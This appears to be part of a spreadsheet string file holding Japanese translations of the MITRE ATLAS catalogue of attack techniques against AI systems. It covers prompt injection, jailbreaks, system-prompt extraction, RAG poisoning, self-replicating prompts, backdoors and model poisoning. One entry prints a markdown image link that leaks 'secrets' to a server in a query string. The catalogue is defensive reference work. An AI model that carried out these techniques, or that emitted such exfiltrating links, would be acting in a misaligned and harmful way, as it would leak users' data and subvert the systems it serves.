  <si>
    <t>敵対者は、サービスを低下させたり停止させたりする目的で、大量のリクエストで AI システムを標的にすることがあります。多くの AI システムは大量の特殊なコンピューティングを必要とするため、多くの場合、過負荷になる可能性のある費用の掛かるボトルネックとなります。敵対者は、AI システムから大量の無駄なコンピューティングを必要とする入力を意図的に作成できます。</t>
  </si>
  <si>
    <t>機能の開発</t>
  </si>
  <si>
    <t>敵対者は、攻撃を支援するために独自の機能を開発する場合があります。このプロセスには、要件の特定、ソリューションの構築、機能のデプロイが含まれます。AI システムへの攻撃を支援するために使用される機能は、必ずしも AI ベースである必要はありません。例としては、敵対的な情報を含む Web サイトの設定や、難読化された持出し用のコードを含む Jupyter ノートブックの作成などが挙げられます。</t>
  </si>
  <si>
    <t>直接（インジェクション）</t>
  </si>
  <si>
    <t>敵対者は、LLM のユーザーとして直接プロンプトを注入する可能性があります。この種類の注入は、敵対者がシステムへの足掛かりを得たり、LLM 自体を悪用して有害なコンテンツを生成するなどの目的で使用したりする可能性があります。</t>
  </si>
  <si>
    <t>AI アーティファクトの探索</t>
  </si>
  <si>
    <t>敵対者は、プライベート ソースを検索して、システム上に存在する AI アーティファクトを特定し、それらに関する情報を収集する可能性があります。これらのアーティファクトには、モデルの学習とデプロイに使用されるソフトウェア スタック、学習データとテスト データの管理システム、コンテナー レジストリー、ソフトウェア リポジトリー、モデル ズーなどが含まれます。
この情報は、更なる収集、持出し、または中断目的で標的を特定して攻撃を調整し改善するために使用できます。</t>
  </si>
  <si>
    <t>AI モデル ファミリーの探索</t>
  </si>
  <si>
    <t>敵対者は、モデルの一般的なファミリーを探索する可能性があります。モデルに関する一般的な情報はド文書で明らかにされるか、敵対者は慎重に構築された例を使用してモデルの応答を分析し、モデルを分類する可能性があります。
モデル ファミリーの知識は、敵対者がモデルを攻撃する手段を特定し、攻撃をカスタマイズするのに役立ちます。</t>
  </si>
  <si>
    <t>AI モデルのオントロジーの探索</t>
  </si>
  <si>
    <t>敵対者は、AI モデルの出力空間のオントロジー、例えばモデルが検出できるオブジェクトの種類を探索する可能性があります。敵対者は、モデルに繰り返しクエリを実行してオントロジーを発見し、モデルに出力空間を列挙させる可能性があります。または、オントロジーは、構成ファイルまたはモデルに関する文書で発見される可能性があります。
モデルのオントロジーは、モデルが被害者によってどのように使用されているかを敵対者が理解するのに役立ちます。モデルのオントロジーは、敵対者が標的型攻撃を作成する際に役立ちます。</t>
  </si>
  <si>
    <t>AI モデルの出力の探索</t>
  </si>
  <si>
    <t>敵対者は、クラス スコアなどのシステムの動作に必須ではなく、エンドユーザーによる使用も想定されていないモデル出力を探索する可能性があります。モデル出力はログに含まれていたり、API の応答に含まれている場合があります。敵対者は、モデル出力を利用して、モデルの弱点を特定し、攻撃を展開する可能性があります。</t>
  </si>
  <si>
    <t>LLM の幻覚の探索</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデルを操作し、幻覚化された実体を特定する可能性があります。敵対者は、ソフトウェア パッケージ、コマンド、URL、組織名、メール アドレスなどを要求し、現実世界と関連づけられていない幻覚を特定する可能性があります。発見された幻覚は、攻撃者に[幻覚化された実体の公開](/techniques/AML.T0060) の潜在的な標的を提供します。異なる言語モデルでも同じ幻覚が生成されることが示されているため、敵対者が悪用した幻覚は、他の言語モデルを使用しているユーザーにも影響を及ぼす可能性があります。</t>
  </si>
  <si>
    <t>LLM のシステム情報の探索</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデル（LLM）のシステム情報に関する情報を盗み取ろうとします。この情報は、システム命令を含む設定ファイル内、または LLM とのやり取りを通じて抽出される可能性があります。対象となる情報には、システム プロンプト全体、LLM にとって重要な特殊文字、LLM で利用可能な機能を示すキーワードなどが含まれます。LLM への命令の送信方法に関する情報は、攻撃者がシステムの機能を理解し、悪意のあるプロンプトを作成するために利用される可能性があります。</t>
  </si>
  <si>
    <t>ドメイン</t>
  </si>
  <si>
    <t>敵対者は、標的を絞るために利用可能なドメインを取得する可能性があります。ドメイン名とは、1 つ以上の IP アドレスを表すために使用される、人間が判読できる名前です。ドメイン名は購入することも、場合によっては無料で取得することもできます。
敵対者は、取得したドメインを様々な目的で使用する可能性があります（[ATT&amp;CK](https://attack.mitre.org/techniques/T1583/001/) を参照）。大規模な AI データセットは、多くの場合、個々のデータポイントへの URL リストとして配布されます。攻撃者は、これらのデータセットに含まれる期限切れのドメインを取得し、個々のデータポイントを改ざんされたサンプルに置き換える可能性があります（[汚染済みデータセットの公開](/techniques/AML.T0019)）。</t>
  </si>
  <si>
    <t>ドライブ バイによる侵害</t>
  </si>
  <si>
    <t>敵対者は、通常のブラウジングの過程でウェブサイトを訪れるユーザーや、ユーザーに代わってウェブから情報を取得する AI エージェントを通じて、AI システムにアクセスする可能性があります。ウェブサイトには [LLM プロンプト インジェクション](/techniques/AML.T0051) が含まれている可能性があり、これが実行されると AI モデルの挙動が変更される可能性があります。
同じ手法は、AI を直接標的としない他の種類の悪意のあるコードを配信するためにも使用される可能性があります（[ATT&amp;CKにおけるドライブ バイによる侵害](https://attack.mitre.org/techniques/T1189/) を参照）。</t>
  </si>
  <si>
    <t>マルウェアの埋め込み</t>
  </si>
  <si>
    <t>敵対者は、AI モデル ファイルに悪意のあるコードを埋め込む可能性があります。AI モデルは、命令と重みの組み合わせとしてパッケージ化されている場合があります。pickle ファイルなどの一部の形式は、exec などの安全でない呼び出しが含まれている可能性があるため、デシリアライズが安全ではありません。
マルウェアが埋め込まれたモデルでも、期待どおりに動作する可能性があります。これにより、実行、コマンド＆コントロール、またはデータの持出しが可能になる可能性があります。</t>
  </si>
  <si>
    <t>AI モデルの整合性の侵害</t>
  </si>
  <si>
    <t>敵対者は、敵対的なデータ入力によって標的のモデルのパフォーマンスを低下させ、時間の経過とともにシステムへの信頼性を低下させる可能性があります。これにより、被害を受けた組織は、システムの修正を試みたり、自動化されることになっていたタスクを手動で実行したりすることで、時間と費用を無駄にする可能性があります。</t>
  </si>
  <si>
    <t>データセットの整合性の侵害</t>
  </si>
  <si>
    <t>敵対者は、データセットの一部を改ざんまたは操作して、その有用性を低下させ、信頼を低下させ、ユーザーがエラーを修正するためにリソースを無駄にするように仕向ける可能性があります。</t>
  </si>
  <si>
    <t>アカウントの確立</t>
  </si>
  <si>
    <t>敵対者は、[AI 攻撃のステージング](/tactics/AML.TA0001)に必要なリソースにアクセスするために、標的の絞り込み用または被害者へのなりすまし用のアカウントをさまざまなサービスで作成する可能性があります。</t>
  </si>
  <si>
    <t>AI モデルの回避</t>
  </si>
  <si>
    <t>敵対者は、AI モデルがデータの内容を正しく識別するのを妨げる [敵対的データの作成](/techniques/AML.T0043) を行うことができます。この手法は、AI が利用される下流のタスクを回避するために使用できます。敵対者は、従来のサイバー攻撃の目標に向けた AI ベースのウイルス/マルウェア検出やネットワーク スキャンを回避する可能性があります。</t>
  </si>
  <si>
    <t>AI の推論 API による流出</t>
  </si>
  <si>
    <t>敵対者は、[AI モデル推論 API へのアクセス](/techniques/AML.T0040) を介して個人情報を持出す可能性があります。AI モデルは、学習データに関する秘匿情報を漏洩することが示されています（例: [学習データのメンバーシップの推論](/techniques/AML.T0024.000)、[AI モデルの反転](/techniques/AML.T0024.001)）。モデル自体も、[AI 知的財産の窃盗](/techniques/AML.T0048.004) の目的で抽出される可能性があります（[AI モデルの抽出](/techniques/AML.T0024.002)）。
秘匿学習データに関する情報の盗み出しは、プライバシーに関する懸念を引き起こします。秘匿学習データには、個人を特定できる情報やその他の保護されたデータが含まれる場合があります。</t>
  </si>
  <si>
    <t>サイバー手段による流出</t>
  </si>
  <si>
    <t>敵対者は、従来のサイバー手段を使用して、AI アーティファクトや、目的に関連するその他の情報を持出す可能性があります。
詳細については、ATT&amp;CK の戦術 [持出し](https://attack.mitre.org/tactics/TA0010/) を参照してください。</t>
  </si>
  <si>
    <t>公開アプリケーションの悪用</t>
  </si>
  <si>
    <t>敵対者は、ソフトウェア、データ、またはコマンドを使用して、インターネットに接続されたコンピュータまたはプログラムの弱点を悪用し、意図しない、または予期しない動作を起こそうとすることがあります。システムの弱点は、バグ、不具合、または設計上の脆弱性である可能性があります。これらのアプリケーションは、多くの場合 Web サイトですが、データベース (SQL など)、標準サービス (SMB や SSH など)、ネットワーク デバイス管理および管理プロトコル (SNMP や Smart Install など)、および Web サーバーや関連サービスなど、インターネットにアクセス可能なオープン ソケットを持つその他のアプリケーションも含まれる場合があります。</t>
  </si>
  <si>
    <t>外部への危害</t>
  </si>
  <si>
    <t>敵対者は、被害者のシステムへのアクセスを悪用し、そのシステムのリソースや機能を利用して、システムの外部に危害を与えることで、目的を達成する可能性があります。これらの危害は、組織（金銭的損害、風評被害など）、そのユーザー（ユーザー被害など）、または一般大衆（社会的損害など）に影響を及ぼす可能性があります。</t>
  </si>
  <si>
    <t>AI モデルの抽出</t>
  </si>
  <si>
    <t>敵対者は、プライベート モデルの機能コピーを抽出する可能性があります。敵対者は、被害者の [AI モデルの推論 API へのアクセス](/techniques/AML.T0040) を繰り返しクエリーを行うことで、標的のモデルの推論をデータセットに収集できます。推論は、標的のモデルの動作とパフォーマンスを模倣する別のモデルをオフラインで学習するためのラベルとして使用されます。
敵対者は、モデルを抽出して、サービスとしての AI (AIaaS) におけるクエリーごとの料金を支払わないようにする可能性があります。モデルの抽出は、[AI 知的財産の窃取](/techniques/AML.T0048.004) に使用されます。</t>
  </si>
  <si>
    <t>LLM システム プロンプトの抽出</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデル（LLM）のシステム プロンプトを抽出しようとする可能性があります。これは、モデルに独自のシステム プロンプトを表示させるプロンプト インジェクションによって実行される場合もあれば、設定ファイルから抽出される場合もあります。
システム プロンプトは AI プロバイダーの競争優位性の一部となる可能性があり、敵対者の標的となる可能性のある貴重な知的財産です。</t>
  </si>
  <si>
    <t>偽 RAG エントリ インジェクション</t>
  </si>
  <si>
    <t>敵対者は、被害者の検索拡張生成（RAG）データベースに偽のエントリを挿入する可能性があります。RAG データベースに取り込まれるデータソースには、RAG システムで使用される大規模言語モデル（LLM）によって文書として解釈されるように設計されたコンテンツが含まれます。偽の文書を含む RAG エントリを取得すると、LLM は検索コンテンツの一部を偽の RAG 結果として扱うように仕向けられます。
偽の RAG 文書を通常の RAG エントリ内に含めることで、データ監視ツールを回避します。また、文書が直接削除されることも防ぎます。
敵対者は、発見したシステム キーワードを使用して、特定の LLM にコンテンツを RAG エントリとして扱うように指示する方法を知る可能性があります。敵対者は、挿入したエントリのメタデータ（文書のタイトル、作成者、作成日など）を操作できる可能性があります。</t>
  </si>
  <si>
    <t>財務的損害</t>
  </si>
  <si>
    <t>財務的損害には、窃取、詐欺、偽造による富、財産、またはその他の金銭的資産の損失、または敵対者に資金を提供する圧力が含まれます。</t>
  </si>
  <si>
    <t>AI モデルへの完全なアクセス</t>
  </si>
  <si>
    <t>RAG インデックス化された対象の収集</t>
  </si>
  <si>
    <t>敵対者は、標的を絞りこむために、検索拡張生成（RAG）システムで使用されるデータソースを特定する可能性があります。これらのソースを特定することで、敵対者は AI が依存する外部データ リポジトリの改ざんや不正操作に集中することができます。
RAG インデックス化されたデータは、システムに関する公開文書内や、システムに直接アクセスし外部データソースの存在を示す兆候や参照を観察することでも特定できます。</t>
  </si>
  <si>
    <t>生成 AI</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデル（LLM）などの生成 AI モデルやツールを探し出し入手することで、様々な活動を支援する可能性があります。生成 AI は、マルウェアや攻撃的なサイバー スクリプトの生成、[検索コンテンツの作成](/techniques/AML.T0066)、[fフィッシング](/techniques/AML.T0052) コンテンツの生成など、様々な悪意ある方法で使用される可能性があります。
敵対者は、オープンソース モデルを入手したり、生成 AI サービスを利用したりする可能性があります。生成 AI モデルが生成できる応答の種類を制限する制約を回避するには、生成 AI モデルの脱獄が必要になる場合があります。また、生成 AI の利用規約に違反する必要がある場合もあります。</t>
  </si>
  <si>
    <t>ハードウェア</t>
  </si>
  <si>
    <t>敵対者は、ハードウェア サプライチェーンを妨害したり操作したりすることで AI システムを標的にする可能性があります。AI モデルは、GPU、TPU、組み込みデバイスなどの特殊なハードウェア上で実行されることが多いですが、CPU 上で動作するように最適化されている場合もあります。</t>
  </si>
  <si>
    <t>なりすまし</t>
  </si>
  <si>
    <t>敵対者は、信頼できる人物や組織になりすまし、標的を説得し、騙して自分に代わって何らかの行動を取らせる可能性があります。例えば、敵対者は、幹部、同僚、サードパーティ ベンダーなどの既知の送信者になりすまし、被害者とやりとりを行う可能性があります（[フィッシング](/techniques/AML.T0052)、または[LLM ソーシャル エンジニアリングによるスピア フィッシング](/techniques/AML.T0052.000)）。そして、確立された信頼関係を悪用し、敵対者は最終的な目的を達成するために、場合によっては複数の被害者を標的とします。
敵対者は、モデル リポジトリ、コンテナ レジストリ、ソフトウェア レジストリなど、AI DevOps ライフサイクルの一部であるリソースを標的とする可能性があります。</t>
  </si>
  <si>
    <t>間接（インジェクション）</t>
  </si>
  <si>
    <t>敵対者は、データベースやウェブサイトから取得したテキストやマルチメディアなど、LLM によって取り込まれた別のデータ チャネルを介して間接的にプロンプトを注入する可能性があります。これらの悪意のあるプロンプトは、ユーザーから隠蔽されたり難読化されたりする場合があります。この種類の注入は、敵対者がシステムへの足掛かりを得たり、システムの知らないユーザーを標的にしたりするために使用される可能性があります。</t>
  </si>
  <si>
    <t>学習データのメンバーシップ推論</t>
  </si>
  <si>
    <t>敵対者は、データ サンプルの学習データセット内のメンバーシップを推測する可能性があります。これにより、プライバシーに関する懸念が生じます。一部の戦略では、[レプリケーションによるプロキシの学習](/techniques/AML.T0005.001) で取得できるシャドウ モデルを使用し、その他の戦略ではモデル予測スコアの統計を使用します。
これにより、被害者モデルから、学習データセット内の個人情報やその他の保護された知的財産などの秘匿情報が漏洩する可能性があります。</t>
  </si>
  <si>
    <t>バックドア トリガーの挿入</t>
  </si>
  <si>
    <t>敵対者は、推論データにパーセプチュアル トリガーを追加する可能性があります。トリガーは、人間には知覚できないか、または明らかでない可能性があります。この手法は、[AI モデルの汚染](/techniques/AML.T0018.000) と組み合わせて使用され、敵対者は標的のモデルで目的の効果を生み出すことができます。</t>
  </si>
  <si>
    <t>AI モデルの反転</t>
  </si>
  <si>
    <t>AI モデルの学習データは、推論 API 経由で利用できる信頼スコアを悪用することで再構築できます。推論 API に対して戦略的にクエリーを行うことによって、敵対者は学習データ内に埋め込まれている可能性のある秘匿情報を取り出すことができます。敵対者がアルゴリズムで使用される機密情報を扱う機能のデータを再構築できる場合、プライバシー侵害につながる可能性があります。</t>
  </si>
  <si>
    <t>定期刊行物やカンファレンス議事録</t>
  </si>
  <si>
    <t>主要な機械学習カンファレンスや定期刊行物で受理される出版物の多くは、商業ラボからのものです。定期刊行物やカンファレンスの中にはオープン アクセスのものもありますが、アクセスや会員登録に料金がかかるものもあります。これらの出版物では、再現性に関する特定のアプローチのあらゆる側面が詳細に説明されていることがよくあります。この情報は、敵対者が論文の内容を実装するために使用できます。</t>
  </si>
  <si>
    <t>LLM からのデータ漏洩</t>
  </si>
  <si>
    <t>敵対者は、LLM に機密情報を漏洩させるプロンプトを作成する可能性があります。これには、個人のユーザー データやプロプラエタリー情報が含まれる場合があります。漏洩した情報は、プロプラエタリーな学習データ、LLM が接続されているデータ ソース、または LLM の他のユーザーからの情報から取得される可能性があります。</t>
  </si>
  <si>
    <t>LLM の脱獄</t>
  </si>
  <si>
    <t>敵対者は、LLM に設定された管理策、制限、またはガードレールを回避して、LLM をユーザー入力に自由に応答できる状態にするように設計され慎重に作成された [LLM プロンプト インジェクション](/techniques/AML.T0051) を使用する可能性があります。脱獄に成功すると、LLM は敵対者によって意図しない方法で使用される可能性があります。</t>
  </si>
  <si>
    <t>LLM プロンプトの作成</t>
  </si>
  <si>
    <t>敵対者は、標的の生成 AI システムに関する知識を活用して、防御を回避し、悪意のある命令を実行できるプロンプトを作成する可能性があります。
敵対者は、プロンプトが常に意図通りに動作するように、プロンプトを反復的に変更する可能性があります。</t>
  </si>
  <si>
    <t>LLM プロンプト インジェクション</t>
  </si>
  <si>
    <t>敵対者は、LLM への入力として悪意のあるプロンプトを作成し、LLM が意図しない方法で動作するようにする可能性があります。これらの「プロンプト インジェクション」は、多くの場合、モデルが元の指示の側面を無視し、代わりに攻撃者の指示に従うように設計されています。
プロンプト インジェクションは、LLM への最初のアクセス ベクトルとなり、敵対者が作戦の他の手順を実行するための足掛かりを提供します。プロンプト インジェクションは、LLM の防御を回避するように設計されているか、攻撃者が特権コマンドを発行できるように設計されている可能性があります。プロンプト インジェクションの影響は、LLM との対話型セッション全体にわたって持続する可能性があります。
悪意のあるプロンプトは、LLM を利用して有害なコンテンツを生成するか、システムに足掛かりを築いてさらなる影響をもたらすために、攻撃者によって直接注入される可能性があります （[直接](/techniques/AML.T0051.000)）。LLM が通常の動作の一環として別のデータ ソースから読み込む際そのデータ ソースに悪意のあるプロンプトが存在しそれを取り込むときに、プロンプトが間接的に注入されることもあります （[間接](/techniques/AML.T0051.001)）。この種類の注入は、敵対者がシステムへの足掛かりとして、または LLM のユーザーを標的にするために使用される可能性があります。</t>
  </si>
  <si>
    <t>LLM プロンプトの難読化</t>
  </si>
  <si>
    <t>敵対者は、検出を回避するために、プロンプト インジェクションや検索コンテンツをユーザーから隠ぺいしたり、難読化したりする可能性があります。
これには、小さなテキスト、背景と同じ色のテキスト、非表示の HTML 要素など、インジェクションのレンダリング方法を変更することが含まれます。</t>
  </si>
  <si>
    <t>LLM プロンプトの自己複製</t>
  </si>
  <si>
    <t>敵対者は、LLM が出力の一部としてプロンプトを複製するように巧妙に細工された [LLM プロンプト インジェクション](/techniques/AML.T0051) を使用する可能性があります。これにより、プロンプトは他の LLM に伝播し、システム上に永続化されます。自己複製型のプロンプトは通常、他の悪意のある命令（例：[LLM の脱獄](/techniques/AML.T0054)、[LLM からのデータ漏洩](/techniques/AML.T0057)）と組み合わせて使用されます。</t>
  </si>
  <si>
    <t>LLM 応答のレンダリング</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデル（LLM）を利用して、ユーザーのクライアントがレスポンスをレンダリングする際にユーザーからは見えない秘匿情報と一緒に応答を返させるようにする可能性があります。そして、その秘匿情報は持出されます。これは、敵対者が管理するサーバーに自動的にリクエストを送信するレンダリング画像や、ユーザーの操作を必要とするクリック可能なリンクといった形で行われる可能性があります。
例えば、LLM は以下のようなマークダウンを生成する可能性があります。
```
![ATLAS](https://atlas.mitre.org/image.png?secrets=private_data)
```
これは、クライアントによって以下のようにレンダリングされます。
```
&lt;img src="https://atlas.mitre.org/image.png?secrets=private_data"&gt;
```
要求された画像をホストしている敵対者のサーバーがリクエストを受信すると、敵対者は `secrets` クエリ パラメータの内容を受け取ります。</t>
  </si>
  <si>
    <t>LLM からの信頼された出力コンポーネントの操作</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデル（LLM）へのプロンプトを利用して、応答の様々な構成要素を操作することで、ユーザーにとって信頼できるように見せかけることがあります。これにより、敵対者は、被害者の環境で活動を継続し、その環境とインタラクションするユーザーによる検知を回避できます。
LLM は、ユーザーにとってより信頼できるように言語を調整したり、ユーザーに特定の行動を取らせようと操作したりするよう指示される可能性があります。操作される可能性のあるその他の応答構成要素には、リンク、推奨されるフォローアップ アクション、取得文書のメタデータ、[引用](/techniques/AML.T0067.000) などがあります。</t>
  </si>
  <si>
    <t>悪意のあるパッケージ</t>
  </si>
  <si>
    <t>敵対者は、ユーザーがインポートすると有害な影響を及ぼす悪意のあるソフトウェア パッケージを開発する可能性があります。悪意のあるパッケージは、ユーザーの予想通りに動作する可能性があります。また、[AI サプライチェーンの侵害](/techniques/AML.T0010) を通じて導入される場合もあります。ユーザーにとって明らかに悪意のあるパッケージとは見なされず、AI 関連のタスクに役立つように見える場合もあります。</t>
  </si>
  <si>
    <t>AI モデルの操作</t>
  </si>
  <si>
    <t>敵対者は、AI モデルを直接操作してその動作を変更したり、悪意のあるコードを導入したりする可能性があります。モデルを操作することで、敵対者は、システムに永続的な変更を加えることができます。これには、重みを変更してモデルを汚染する、モデル アーキテクチャを改変して動作を変更する、モデルの読み込み時に実行される可能性のあるマルウェアを埋め込むなどが含まれます。</t>
  </si>
  <si>
    <t>手動による変更</t>
  </si>
  <si>
    <t>敵対者は、入力データを手動で変更して敵対的データを作成する可能性があります。敵対者は、標的のモデルに関する知識を使用して、モデルがタスクを実行するのに役立つと思われるデータの一部を変更する可能性があります。敵対者は、敵対的入力が機能することを確認できるまで試行錯誤する可能性があります。</t>
  </si>
  <si>
    <t>マスカレード</t>
  </si>
  <si>
    <t>敵対者は、自身のアーティファクトの機能を操作し、ユーザーやセキュリティ ツールに対して正当または無害であるように見せかけようとする場合があります。マスカレードとは、防御や監視を回避するために、オブジェクトの名前や場所（正当か悪意があるかは問いません）が操作または悪用される場合に発生します。これには、ファイルのメタデータを操作したり、ユーザーにファイルの種類を誤認させたり、正当なタスク名やサービス名を偽装したりすることが含まれます。</t>
  </si>
  <si>
    <t>モデル（注: 原文では Model）</t>
  </si>
  <si>
    <t>AI 対応のシステムは、さまざまな方法でオープンソース モデルに依存することがよくあります。最も一般的な点は、被害者組織がこれらのモデルを微調整に使用していることです。これらのモデルは外部ソースからダウンロードされ、その後、より小規模なプライベート データセットで調整されるモデルのベースとして使用されます。モデルの読み込みには、保存されたモデル ファイルの形式で保存されたコードを実行する必要があることがよくあります。これらは、従来のマルウェアや敵対的な AI 手法によって侵害される可能性があります。</t>
  </si>
  <si>
    <t>モデル（注: 原文では Models）</t>
  </si>
  <si>
    <t>敵対者は、公開モデルを入手して、それを攻撃活動に使用する場合があります。
敵対者は、被害者組織が使用するモデル、または被害者組織が使用するモデルを代表するモデルを探す場合があります。
代表するモデルには、モデル アーキテクチャー、またはアーキテクチャーやデータセットの学習のモデル パラメータを定義する事前学習済みモデルが含まれます。
敵対者は、YAML または Python 構成ファイルなどの一般的なモデル アーキテクチャーの構成ファイル形式、および ONNX (.onnx)、HDF5 (.h5)、Pickle (.pkl)、PyTorch (.pth)、TensorFlow (.pb、.tflite) などの一般的なモデルのストレージ ファイル形式を公開ソースで検索する場合があります。
取得したモデルは、敵対者の攻撃活動の高度化に役立ち、攻撃を被害者のモデルに合わせて調整するために頻繁に使用されます。</t>
  </si>
  <si>
    <t>AI モデルのアーキテクチャの改変</t>
  </si>
  <si>
    <t>敵対者は、AI モデルのアーキテクチャを直接改変し、その動作を再定義する可能性があります。これには、レイヤーの追加や削除、前処理や後処理の追加などが含まれます。
その影響としては、特定のクラスの予測能力の喪失、誤った演算の追加による計算コストの増加、パフォーマンスの低下などが挙げられます。さらに、敵対者が定義した別のネットワークを計算グラフに注入することで、入力に基づいて動作を変更し、事実上バックドアを作成することも可能になります。</t>
  </si>
  <si>
    <t>機能の獲得</t>
  </si>
  <si>
    <t>敵対者は、自らの活動に使用するソフトウェア機能を検索して取得する場合があります。その機能は、AI ベースの攻撃に固有のものである場合（[AI への敵対的な攻撃の実装](/techniques/AML.T0016.000)）や、悪意のある目的で再利用された汎用ソフトウェア ツール（[ソフトウェア ツール](/techniques/AML.T0016.001)）があります。どちらの場合も、敵対者は特定の AI 対応システムを標的にするために機能を変更またはカスタマイズする可能性があります。</t>
  </si>
  <si>
    <t>フィッシング</t>
  </si>
  <si>
    <t>敵対者は、被害者のシステムにアクセスするためにフィッシング メッセージを送信することがあります。すべてのフィッシング形態は、電子的に配信されるソーシャル エンジニアリングです。フィッシングは標的を絞ったものになる可能性があり、これをスピア フィッシングと呼びます。スピア フィッシングでは、特定の個人、企業、または業界が攻撃者の標的になります。より一般的には、敵対者は、大量のマルウェア スパム キャンペーンなど、標的を絞らないフィッシングを実行することができます。
合成テキスト、顔のビジュアル ディープフェイク、会話のオーディオ ディープフェイクを生成する LLM などの生成 AI により、敵対者は標的を絞ったフィッシング キャンペーンを拡大できます。LLM は、テキスト会話を介してユーザーと対話でき、機密情報をフィッシングするためのメタ プロンプトをプログラムできます。ディープフェイクは、フィッシングの補助としてなりすましに使用できます。</t>
  </si>
  <si>
    <t>物理的な対抗手段</t>
  </si>
  <si>
    <t>敵対者は、攻撃を補助または支援するために、物理的な対抗手段を入手または製造する可能性があります。
これらの構成要素は、ステッカーや T シャツに印刷された敵対的なパターン、変装、おとりなど、モデルを妨害または劣化させるために使用される可能性があります。また、レーザー ポインター、電球、その他のツールなど、データ収集に使用されるセンサーを妨害または劣化させるために使用される可能性もあります。</t>
  </si>
  <si>
    <t>物理環境へのアクセス</t>
  </si>
  <si>
    <t>敵対者は、純粋にデジタル領域で行われる攻撃に加えて、物理環境を攻撃に悪用する可能性もあります。モデルが何らかの方法で現実世界から収集されたデータとやり取りしている場合、敵対者はデータが収集されている場所にアクセスすることでモデルに影響を与えることができます。収集プロセスでデータを改変することで、敵対者はデジタル アクセス用に設計された攻撃の修正版を実行できます。</t>
  </si>
  <si>
    <t>AI モデルの汚染</t>
  </si>
  <si>
    <t>敵対者は、AI モデルの重みを操作して動作や性能を変更し、モデルを汚染する可能性があります。敵対者は、重みを直接操作したり、汚染されたデータでモデルを学習させたり、モデルをさらに微調整したり、その他の方法で学習プロセスに干渉したりすることで、モデルを汚染する可能性があります。
汚染されたモデルの動作の変化は、予測 AI モデルの場合は特定のカテゴリに限定され、生成 AI モデルの場合は特定のトピックや概念、事実に限定されるか、全体的なパフォーマンスの低下を狙う可能性があります。</t>
  </si>
  <si>
    <t>学習データの汚染</t>
  </si>
  <si>
    <t>敵対者は、基盤となるデータまたはそのラベルを変更することで、AI モデルで使用されるデータセットを汚染しようとする可能性があります。これにより、敵対者は、簡単には検出できない可能性のあるデータを学習した AI モデルに脆弱性を埋め込むことができます。データ汚染攻撃では、ラベルの変更が必要な場合とそうでない場合があります。埋め込まれた脆弱性は、後で [バックドア トリガーの挿入](/techniques/AML.T0043.004) を含むデータ サンプルによってアクティブ化されます。
汚染されたデータは [AI サプライ チェーンの侵害](/techniques/AML.T0010) によって導入されるか、敵対者がシステムへの [初期アクセス](/tactics/AML.TA0004) を取得した後に汚染される可能性があります。</t>
  </si>
  <si>
    <t>プレプリント リポジトリ</t>
  </si>
  <si>
    <t>arXiv などのプレプリント リポジトリには、査読されていない最新の学術研究論文が含まれています。定期刊行物やカンファレンス議事録には、通常掲載されない研究ノートや技術レポートが含まれている場合があります。プレプリント リポジトリは、定期刊行物に受理された論文を共有する中心的な場所としても機能します。プレプリント リポジトリーを検索すると、敵対者は被害者組織の研究者が取り組んでいる比較的最新の情報を得ることができます。</t>
  </si>
  <si>
    <t>幻覚化されたエンティティの公開</t>
  </si>
  <si>
    <t>敵対者は、LLM によって幻覚化された情報源に、ソフトウェア パッケージ、ウェブサイト、メール アドレスなど、自らが管理するエンティティを作成することがあります。幻覚は、パッケージ名、コマンド、URL、企業名、メール アドレスといった形で提示され、敵対者が管理するエンティティへと被害者を誘導します。敵対者が管理するエンティティと被害者がやり取りすることで、攻撃が進行します。</t>
  </si>
  <si>
    <t>汚染済みデータセットの公開</t>
  </si>
  <si>
    <t>敵対者は [学習データの汚染](/techniques/AML.T0020) を行い、それを公共の場所に公開する可能性があります。汚染されたデータセットは、新しいデータセットの場合もあれば、既存のオープン ソース データセットの汚染された亜種の場合もあります。このデータは、[AI サプライ チェーンの侵害](/techniques/AML.T0010) を介して被害者のシステムに導入される可能性があります。</t>
  </si>
  <si>
    <t>汚染済みモデルの公開</t>
  </si>
  <si>
    <t>敵対者は、モデル レジストリやコード リポジトリなどの公開場所に、改ざんされたモデルを公開する可能性があります。改ざんされたモデルは、新しいモデルの場合もあれば、既存のオープンソース モデルの改ざんされた亜種である場合もあります。このモデルは、[AI サプライチェーンの侵害](/techniques/AML.T0010)を通じて被害者のシステムに導入される可能性があります。</t>
  </si>
  <si>
    <t>RAG の汚染</t>
  </si>
  <si>
    <t>敵対者は、検索拡張生成（RAG）システムによってインデックス化されたデータに悪意のあるコンテンツを挿入し、RAG ベースの検索結果を通じて将来のスレッドを汚染する可能性があります。これは、RAG がインデックス化する場所に操作された文書を配置することで実現されます（[RAG インデックス化された対象の収集](/techniques/AML.T0064) を参照）。
コンテンツは、特定のユーザー クエリに対して常に検索結果に表示されるように標的を絞られる可能性があります。敵対者のコンテンツには、虚偽または誤解を招く情報が含まれる可能性があります。また、悪意のある指示や偽の RAG エントリを含むプロンプト インジェクションも含まれる可能性があります。</t>
  </si>
  <si>
    <t>風評被害</t>
  </si>
  <si>
    <t>風評被害は、組織に対する公衆の認知と信頼の低下を伴います。評判が傷つけられる事件の例としては、スキャンダルやなりすましなどが挙げられます。</t>
  </si>
  <si>
    <t>検索コンテンツの作成</t>
  </si>
  <si>
    <t>敵対者は、ユーザーのクエリによって検索されることを意図したコンテンツを作成し、システムのユーザーに何らかの影響を与える可能性があります。これは、ユーザーがシステムに対して抱いている信頼を悪用するものです。
細工されたコンテンツは、プロンプト インジェクションと組み合わせられる可能性があります。また、別の文書や電子メールに単独で存在する場合もあります。敵対者は、細工されたコンテンツを、検索拡張生成（RAG）システムで使用されるベクトル データベースなどの被害者のデータベースに取り込む必要があります。これは、サイバー アクセス、または RAG システムに共通する取り込み機構の悪用によって実現される可能性があります（[RAG の汚染](/techniques/AML.T0070) を参照）。
敵対者がコンテンツを作成するための補助として、大規模言語モデルが使用される可能性があります。</t>
  </si>
  <si>
    <t>リバース シェル</t>
  </si>
  <si>
    <t>敵対者は、リバース シェルを利用して、標的のシステムと通信し、制御する可能性があります。
通常、ユーザーはクライアントを使用して、接続を待機しているリモート マシンに接続します。リバース シェルを使用すると、敵対者は標的のシステムから開始される着信接続を待機します。</t>
  </si>
  <si>
    <t>アプリケーション リポジトリの検索</t>
  </si>
  <si>
